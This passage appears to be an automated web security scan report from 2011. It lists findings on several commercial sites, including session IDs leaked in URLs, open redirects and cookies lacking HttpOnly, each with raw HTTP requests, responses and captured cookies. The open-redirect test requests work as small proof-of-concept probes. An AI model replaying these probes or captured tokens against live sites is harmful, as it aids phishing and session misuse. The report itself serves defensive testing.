6relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11292fe0c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=JiRbTdDJf_XFhA08IkStxmSX; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtechcrunch.com%26placement%3Drecommendations%26extra_1%3Dhttp%253A%252F%252Ftechcrunch.com%252F2011%252F02%252F16%252Fforbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links%252F%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f290827b98&origin=http%3A%2F%2Ftechcrunch.com%2Ff37caceca&relation=parent&transport=postmessage&frame=f11292fe0c
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.36.166.110
X-Cnection: close
Date: Sun, 27 Feb 2011 02:30:42 GMT
Content-Length: 0


5.66. http://www.networksolutions.com/domain-name-registration/RV8.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networksolutions.com
Path:   /domain-name-registration/RV8.jsp

Request

GET /domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992 HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:30:51 GMT
Set-cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=qevx; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=7f54a2c886d230536bf4e8264959; Expires=Fri, 17-Mar-2079 19:44:57 GMT; Path=/
Set-cookie: landing=P13C8S570N0B9A1D661E0000V104; Expires=Tue, 29-Mar-2011 16:30:51 GMT; Path=/
Content-type: text/html;charset=UTF-8
Date: Sun, 27 Feb 2011 16:30:51 GMT
Vary: accept-encoding
Content-Length: 47890

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8">

       <title>Do
...[SNIP]...
<div class="logo"><a href="/;jsessionid=7f54a2c886d230536bf4e8264959:qevx" title="Network Solutions Home" ><img src="/img/graphics/navigation/noTab/ns-logo.png" alt="Network Solutions" border="0" />
...[SNIP]...
<li id="c-deals"><a href="/promotions-and-free-offers.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" >Hot Deals</a>
...[SNIP]...
<li id="c-renew"><a href="/manage-it/bulk-renewal.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" >Renew Services</a>
...[SNIP]...
<div><a href="/manage-it/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" class="manage-button" rel="nofollow" ><img src="/img/buttons/navigation/btn-manage-account.gif" alt="Manage Account"/>
...[SNIP]...
<span class="rvtfn">                                        
                                   <a href="/contact/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" title="Contact Us" name="1RV7CU" class="omniture-link" >Contact Us</a>
...[SNIP]...
<li class="noLeftLine"><a href="/help/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RV7SUP" class="omniture-link" >Support</a>
...[SNIP]...
<li class="noRighLine"><a href="/affiliate-program/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RV7AFF" class="omniture-link" >Affiliates</a>
...[SNIP]...
<li class="noRighLine"><a href="/reseller-program/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RV7RES" class="omniture-link" >Resellers</a>
...[SNIP]...
<li class="navItem first">
           <a href="/domain-name-registration/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DN" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/domain-name-registration/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DN" class="omniture-link" >Domain Name Search</a>
...[SNIP]...
<li><a href="/domain-name-registration/pending.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DN" class="omniture-link" >Expired Domains</a>
...[SNIP]...
<li><a href="/build-it/forwarding.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DN" class="omniture-link" >Web Forwarding</a>
...[SNIP]...
<li><a href="/domain-transfer/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DN" class="omniture-link" >Transfer Your Domain Name</a>
...[SNIP]...
<li class="cap all"><a href="/domain-name-registration/private.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DN" class="omniture-link" >Private Registration</a>
...[SNIP]...
<li class="navItem">
           <a href="/create-a-website/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7WS" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/create-a-website/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7WS" class="omniture-link" >Website Package</a>
...[SNIP]...
<li><a href="/free-website/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7WS" class="omniture-link" >Free Website</a>
...[SNIP]...
<li><a href="/mobile-website/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7WS" class="omniture-link" >Mobile Website</a>
...[SNIP]...
<li><a href="/e-commerce/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7WS" class="omniture-link" >Ecommerce Website</a>
...[SNIP]...
<li class="cap"><a href="/small-business/getting-online.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7WS" class="omniture-link" >All Website Solutions &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/web-hosting/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7HP" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/web-hosting/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7HP" class="omniture-link" >Web Hosting</a>
...[SNIP]...
<li><a href="/web-hosting/wordpress/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7HP" class="omniture-link" >WordPress&reg; Blog Hosting</a>
...[SNIP]...
<li><a href="/web-hosting/sharepoint/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7HP" class="omniture-link" >SharePoint&reg; Hosting</a>
...[SNIP]...
<li><a href="/vps/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7HP" class="omniture-link" >VPS Hosting</a>
...[SNIP]...
<li class="cap"><a href="/web-hosting/packages.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7HP" class="omniture-link" >All Hosting Packages &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/email-account/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7E" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/email-account/personal-email.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7E" class="omniture-link" >Personalized Email</a>
...[SNIP]...
<li><a href="/email-account/business-email.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7E" class="omniture-link" >Business Email</a>
...[SNIP]...
<li class="cap"><a href="/email-account/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7E" class="omniture-link" >All Email Solutions &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/e-commerce/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7ECOM" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/e-commerce/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7ECOM" class="omniture-link" >Ecommerce Website</a>
...[SNIP]...
<li class="cap"><a href="/merchant-accounts/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7ECOM" class="omniture-link" >Merchant Accounts</a>
...[SNIP]...
<li class="navItem">
           <a href="/SSL-certificates/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OS" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/SSL-certificates/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OS" class="omniture-link" >SSL Certificates</a>
...[SNIP]...
<li><a href="/security-suite/site-confirm-seal.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OS" class="omniture-link" >Site Seal</a>
...[SNIP]...
<li><a href="/security-suite/watchdog.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OS" class="omniture-link" >Security and Performance Monitoring</a>
...[SNIP]...
<li class="cap"><a href="/security-suite/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OS" class="omniture-link" >All Security Products &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/online-marketing/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OM" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/online-marketing/search-engine-optimization.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OM" class="omniture-link" >Search Engine Optimization (SEO)</a>
...[SNIP]...
<li><a href="/online-marketing/ecommerce-seo.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OM" class="omniture-link" >SEO for Ecommerce <em>
...[SNIP]...
<li><a href="/web-site-promotion/search-engine-submission.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OM" class="omniture-link" >Local Search Visibility</a>
...[SNIP]...
<li><a href="/pay-per-click/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OM" class="omniture-link" >Pay Per Click Advertising (PPC)</a>
...[SNIP]...
<li><a href="/web-site-promotion/email-marketing-campaigns.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OM" class="omniture-link" >Email Marketing</a>
...[SNIP]...
<li><a href="/press-release-services/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OM" class="omniture-link" >Online Press Release</a>
...[SNIP]...
<li class="cap"><a href="/online-marketing/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7OM" class="omniture-link" >All Online Marketing Services &gt;</a>
...[SNIP]...
<li class="navItem">
           <a href="/design-develop/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DS" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/web-design-services/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DS" class="omniture-link" >Website Design</a>
...[SNIP]...
<li><a href="/e-commerce/web-design/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DS" class="omniture-link" >Ecommerce Web Design</a>
...[SNIP]...
<li><a href="/design-develop/website-enhancements/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DS" class="omniture-link" >Web Enhancements</a>
...[SNIP]...
<li><a href="/custom-logo-design/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DS" class="omniture-link" >Custom Logo Design</a>
...[SNIP]...
<li><a href="/design-develop/website-maintenance.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DS" class="omniture-link" >Website Maintenance Options</a>
...[SNIP]...
<li><a href="/design-develop/contact-an-expert.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DS" class="omniture-link" >Contact an Expert</a>
...[SNIP]...
<li class="cap"><a href="/design-develop/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RVH7DS" class="omniture-link" >All Design &amp; Development Services &gt;</a>
...[SNIP]...
<li class="navItem cap">
           <a href="/mobile-website/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RV7MOB" class="omniture-link" ><span>
...[SNIP]...
<li class="first"><a href="/mobile-website/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RV7MOB" class="omniture-link" >Mobile Website</a>
...[SNIP]...
<li class="cap"><a href="/labs/iphone-domain-search.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" name="1RV7MOB" class="omniture-link" >Domain Storm</a>
...[SNIP]...
<!-- sfc:wms begin pageName=/domain-name-registration/RV8.jsp&elementName=breadcrumb&rotationId=-1 --><a href="/;jsessionid=7f54a2c886d230536bf4e8264959:qevx" class="breadCrumbRoot" >Network Solutions</a>
...[SNIP]...
</span>&nbsp;
                <a href="/domain-name-registration/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" >Domain Name Registration</a>
...[SNIP]...
<div class="userStatus">

<a href="/manage-it/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" class="logInOut" rel="nofollow" >Log In</a>
...[SNIP]...
<li><a href="/legal/privacy-policy.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" rel="nofollow" >Privacy Policy</a>
...[SNIP]...
<li><a href="/legal/legal-notice.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" rel="nofollow" >Terms of Use</a>
...[SNIP]...
<li><a href="/legal/static-service-agreement.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" rel="nofollow" >Legal &amp; Policies</a>
...[SNIP]...
<li><a href="/site-map/index.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" >Site Map</a></li><li class="last"><a href="/help/email.jsp;jsessionid=7f54a2c886d230536bf4e8264959:qevx" >Contact Us</a>
...[SNIP]...

5.67. http://www.zoho.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.zoho.com
Path:   /

Request

GET / HTTP/1.1
Host: www.zoho.com
Proxy-Connection: keep-alive
Referer: http://duck.co/portalLogin.do?serviceurl=/&forumGroupUrl=duckduckgo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168905406.1298947680.1.1.utmcsr=duck.co|utmccn=(referral)|utmcmd=referral|utmcct=/subscribeRegister.do; __utma=168905406.68197405.1298947680.1298947680.1298947680.1; __utmc=168905406; __utmb=168905406.1.10.1298947680; rtk=1298947649191

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:56:55 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 05:57:19 GMT
Accept-Ranges: bytes
Cache-Control: public
Expires: Fri, 04 Mar 2011 02:56:55 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 33980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Email Hosting, CRM, Pr
...[SNIP]...
<li><a class="theEcoLogo" title="The Economist" target="_blank" href="http://www.economist.com/people/displaystory.cfm?story_id=12052307&amp;CFID=19845356&amp;CFTOKEN=11506549">&nbsp;</a>
...[SNIP]...

6. Open redirection  previous  next
There are 4 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.


6.1. http://r.nexac.com/e/getdata.xgi [ru parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Request

GET /e/getdata.xgi?dt=br&pkey=jtkr94hrnfw22&ru=http%3a//ad8127a790827d41e/a%3fhttp%3a//ar.atwola.com/atd%3fit%3d7%26iv%3d<na_id>%26rand%3d329065 HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW801i4e0ADNVY

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Location: http://ad8127a790827d41e/a?http://ar.atwola.com/atd?it=7&iv=&rand=329065
Content-type: text/html
Date: Sun, 27 Feb 2011 17:45:09 GMT
Server: lighttpd/1.4.18
Content-Length: 1



6.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225394

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /5/c=25/b=1225394?.a2fb1007d6302d504/=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:34 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7SQNBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQAzdQHU7z%2FII4whZgSARbk8geyAZ6KFaA%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydpIGSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJCRKrRpEyNMGMjQFNq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAUQFZHg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Location: http://.a2fb1007d6302d504/=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


6.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225400

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /5/c=25/b=1225400?.af7444b5c923be2c5/=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:09 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdzay8DAqJfyVl%2BMQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsACsbFRI%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:09 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1t7%2FX7bcYWBg1Et5qy8GEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWToCW3awQgTBjJ0hDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAQVhaNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:09 GMT; Path=/
Location: http://.af7444b5c923be2c5/=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


6.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1226041

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /5/c=25/b=1226041?.a87ccf957205615f6/=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7cx3DLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwBFQhZv; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfyduY7kBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSBjntBWS0aYMJChI7RpBzLfRmjTJmS%2BhTLXX2Q%2Bs1K8C7J5jAwcMnXq6BZxtU7CEKpvQBfiTtiFLsT5eDmmqp3oQnwVb9GFZM0uogsBAAadWGM%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Location: http://.a87ccf957205615f6/=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


7. Cookie without HttpOnly flag set  previous  next
There are 690 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.


7.1. https://accounts.zoho.com/register  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Request

GET /register?serviceurl=http%3A%2F%2Fwww.zoho.com%2F HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
Referer: http://www.zoho.com/company.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
